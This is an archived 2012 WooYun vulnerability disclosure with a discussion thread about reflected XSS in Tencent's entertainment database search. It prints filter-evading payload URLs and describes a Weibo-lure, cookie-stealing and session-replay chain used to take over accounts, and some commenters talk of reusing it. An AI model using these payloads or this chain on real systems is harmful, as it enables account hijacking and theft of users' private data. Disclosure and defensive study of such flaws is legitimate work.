漏洞详情

披露状态:  

2012-08-22: 细节已通知厂商并且等待厂商处理中

2012-08-23: 厂商已经确认,细节仅向厂商公开

2012-09-02: 细节向核心白帽子及相关领域专家公开

2012-09-12: 细节向普通白帽子公开

2012-09-22: 细节向实习白帽子公开

2012-10-07: 细节向公众公开

简要描述:

跨站脚本-可以让战场离得更远,战争更加隐蔽。。。

反射型XSS漏洞不严重?有兴趣看完这篇,自己来评价吧。。。

详细说明:

所有事件由一个反射型XSS开始。

先说说过程:

1、找个正规的站点,加入脚本代码(当然这个站是你可以控制的了,如自己的博客,正规大站的存储型跨站什么的。这样的情况应该很多,而且别人也不会在意。

跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷)

这脚本实际就是一个 iframe ,然后链接是反射型的xss,当然还带有自己的盗取cookie的脚本代码。

2、在腾讯微博发一下简单的微博,带有上述外部正规站的链接(实战中可以加些更吸引的)

跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷)

3、过几分钟后,效果来了。。。看图

跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷)

4、cookie欺骗

跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷)

跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷)

可以看出,可以发微博,看邮箱,还有很多可以做。。。大家自由发挥。。。

如获取好友列表

http://pay.qq.com/cgi-bin/personal/get_user_friends.cgi

跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷)

首先,公布下存在xss的地方

http://datalib.ent.qq.com/cgi-bin/search_ent?keyvalue=\u003cimg%20src=%23%20onerror=eval%28/document.write('\u003cscript src=aaa\u003e\u003c/script\u003e')/.source%29%20/\u003e

http://datalib.ent.qq.com/cgi-bin/search?libid=1&attr=133&tname=star_second.shtml&keyvalue=\u003cimg%20src=%23\u0020onerror=eval....

存在的问题:

1、没有使用httponly

2、身份验证太单一。

这样的跨站十分隐蔽,一般极难发现。看到这个案例,你还敢乱点微博中邮箱中的链接么?

漏洞证明:

可以问问 zeracker

修复方案:

1、没有使用httponly

2、身份验证太单一。

白帽子讨论:

2012-08-22 22:19 | neal ( 普通白帽子 | Rank:82 漏洞数:9 | "><"\')

求忽略,求公开.

1#

2012-08-22 22:31 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

@Jannock 的文章是精品 求忽略 腾讯忽略咯啊

2#

2012-08-22 22:40 | Jannock (核心白帽子 | Rank:1180 漏洞数:102 | 关注技术与网络安全)

编辑漏洞 乌云可以编辑漏洞了。。。

3#

2012-08-22 22:41 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

@Jannock 恭喜你看到了!

4#

2012-08-22 22:42 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

乌云一下又火起来啦~

5#

2012-08-22 22:43 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

乌云一下又火起来啦~

6#

2012-08-22 22:47 | m4trix1 ( 实习白帽子 | Rank:10 漏洞数:2 | 绝对有jj)

这得要哪个年头才能看到

7#

2012-08-22 22:49 | zeracker ( 普通白帽子 | Rank:891 漏洞数:119 | 哥,怒了!)

我知道带头大哥是在做神马了。我是第一个受害者。/抓狂。。 /抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、

8#

2012-08-22 22:50 | zeracker ( 普通白帽子 | Rank:891 漏洞数:119 | 哥,怒了!)

前段时间就劫持了我的企鹅号码。/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、

9#

2012-08-22 23:01 | 情深( 实习白帽子 | Rank:12 漏洞数:4 | 安全小白)

求公开啊

10#

2012-08-22 23:56 | goderci ( 普通白帽子 | Rank:325 漏洞数:29 | http://www.yunday.org)

膜拜神牛

11#

2012-08-23 01:07 | se55i0n ( 普通白帽子 | Rank:523 漏洞数:74 | 世界末日要来了,各种求礼物呀~~)

求腾讯忽略公开~_~

12#

2012-08-23 08:53 | 大和尚( 普通白帽子 | Rank:39 漏洞数:4 | www.ieroot.com 积极向上的心态!百折不挠...)

又见大牛!!! 关注关注关注! 求公开求讲解

13#

2012-08-23 09:11 | zidane ( 实习白帽子 | Rank:13 漏洞数:2 | 噢 乖,你们应该明白 这样下去对我们谁都不...)

求分享 求妹纸

14#

2012-08-23 09:44 | 瘦蛟舞( 普通白帽子 | Rank:274 漏洞数:27 | http://www.yunday.org)

@Jannock 编辑漏洞在哪里=-=~,新发的才行?

15#

2012-08-23 09:58 | Jannock (核心白帽子 | Rank:1180 漏洞数:102 | 关注技术与网络安全)

@瘦蛟舞 厂商没确认的才可以编辑

16#

2012-08-23 10:00 | 瘦蛟舞( 普通白帽子 | Rank:274 漏洞数:27 | http://www.yunday.org)

@Jannock 袄,知道了,谢谢~~~~~·

17#

2012-08-23 10:54 | xsser (核心白帽子 | Rank:249 漏洞数:17 | 极为缓慢,沉重,凝滞的前行)

这个漏洞我不信腾讯能补,还是多发几个公仔吧

18#

2012-08-23 10:56 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@xsser = = 难道是指的,一个站点的xss,就可以得到cookies,从而影响到很遥远的业务?

19#

2012-08-23 11:01 | xsser (核心白帽子 | Rank:249 漏洞数:17 | 极为缓慢,沉重,凝滞的前行)

@gainover 嘿嘿

20#

2012-08-23 13:45 | Max ( 普通白帽子 | Rank:45 漏洞数:7 | 每天都对自己说:一定要对自己好 一定要活...)

mark

21#

2012-08-23 16:59 | px1624 ( 普通白帽子 | Rank:55 漏洞数:7 | 电脑业余爱好者,菜鸟一个,是来交流学习的...)

@Max mark啥意思?

22#

2012-08-23 17:08 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@px1624 大学英语不好好学~~ mark 就是做个记号呗,以便下次来看的意思。

23#

2012-08-23 18:21 | horseluke ( 普通白帽子 | Rank:84 漏洞数:14 | Realize the dream in earnest.)

@xsser 的意思好邪恶啊...我在遥远的地方等你来 -_-||

24#

2012-08-24 14:08 | 啤酒( 普通白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

腾讯要是能补掉这些大家心照不宣的前期构架缺陷.就相当于把腾讯所有业务逻辑都全部重新做一遍.客户端的.web端的.

25#

2012-08-24 14:18 | px1624 ( 普通白帽子 | Rank:55 漏洞数:7 | 电脑业余爱好者,菜鸟一个,是来交流学习的...)

@gainover 哦,我知道mark是记号、书签的意思,还真是直接mark、、、-————唉

26#

2012-09-04 22:48 | seclab_zju ( 普通白帽子 | Rank:78 漏洞数:11 | 浙江大学 网络安全)

这么看来反射型xss也可以形成蠕虫哦。不断的在微博上传播就可以了。

27#

2012-09-05 08:46 | 一刀终情( 普通白帽子 | Rank:138 漏洞数:25 | ??PKAV技术宅社区-安全爱好者)

会不会促使所有大站httponly呢……那xss还有明天么……

28#

2012-09-05 11:22 | gainover (核心白帽子 | Rank:961 漏洞数:48 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

@一刀终情 不是他们不想 http-only,现在他们业务线这么长,腾讯很多地方,程序员都是从 document.cookie里读取skey来使用的,一旦http-only的话,很多程序都要修改。 鉴于成本和可能出现的难以预料的问题,他们是不敢去更改的!!

29#

2012-09-05 12:15 | 一刀终情( 普通白帽子 | Rank:138 漏洞数:25 | ??PKAV技术宅社区-安全爱好者)

@gainover 那这个他们真心没法补了,只能到处堵了……

30#

2012-09-05 18:36 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

提醒:目前漏洞有限制开放中,你的 Rank 级别不够 ( 可以等待进一步公开或者支付 5 个乌云币提前查看

31#

2012-09-05 19:54 | 一刀终情( 普通白帽子 | Rank:138 漏洞数:25 | ??PKAV技术宅社区-安全爱好者)

@Henry:bobo 5个WB而已,值得

32#

2012-09-26 09:47 | zzR ( 普通白帽子 | Rank:374 漏洞数:37 | 我所期待的仅仅是那突如其来的出乎意料)

貌似在J 神测试的时候,俺还点击了那个微博-0-,好怕怕

33#

2012-09-26 09:57 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

。。。。原来还可以这么用。。还好藏了一个qq.com的xss。。空了去玩玩

34#

2012-10-07 08:53 | Night ( 普通白帽子 | Rank:50 漏洞数:12 | 中国社工联盟站长)

木有腾讯的XSS肿么办

35#

2012-10-07 13:43 | 情深( 实习白帽子 | Rank:12 漏洞数:4 | 安全小白)

牛逼 啊,这么利用反射型xss不错

36#

2012-10-08 03:19 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

尝试了一下。不知道为什么我的javascript为什么没有运行。难道是因为我用的<scrtip>的形式导致主流浏览器拦截了xss??我这只收到了一个ie6发来的请求。。@Jannock 不知道你做过这个的浏览器兼容性测试没有

37#

2012-10-08 08:32 | Jannock (核心白帽子 | Rank:1180 漏洞数:102 | 关注技术与网络安全)

@蟋蟀哥哥 你可以看到这个反射型XSS,\u003c编码绕过了主流浏览器拦截。

38#

2012-10-08 10:24 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@Jannock 多谢。

39#

2012-10-08 11:05 | unic02n ( 普通白帽子 | Rank:63 漏洞数:6 | 我是来学习的!)

这种关于架构的缺陷多的是,这就是前期不重视,而后期只能将错就错继续错下去的后果。造成后期的修复手段单一,只能是缝缝补补,不能从根本上解决此类问题。还有很多网站,也是如此。即便有时候认识到这个问题,但是开发和领导们也未必有魄力或者足够的认识去解决这个问题,安全在开发初期的介入是相当有必要的。

40#

2012-10-08 11:05 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@Jannock 你的那个iframe里面用了img scr。是你的漏洞必须还是其他原因?能否把iframe代码文字性发下。。多谢

41#

2012-10-08 11:24 | Jannock (核心白帽子 | Rank:1180 漏洞数:102 | 关注技术与网络安全)

@蟋蟀哥哥 就是这个反射xss是能过 innerHTML 形式注入的,所以使用 img onerror事件来执行脚本。。不能直接 <script

42#

2012-10-08 11:26 | 蟋蟀哥哥( 普通白帽子 | Rank:329 漏洞数:52 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@Jannock 谢谢。。怪不得我这测试有问题。。继续测试去了

43#

2012-12-12 11:20 | 偶尔透透气( 实习白帽子 | Rank:6 漏洞数:1 | 常常潜潜水,偶尔透透气.)

漏洞证明太亮了

44#

转自:http://www.wooyun.org/bugs/wooyun-2010-011192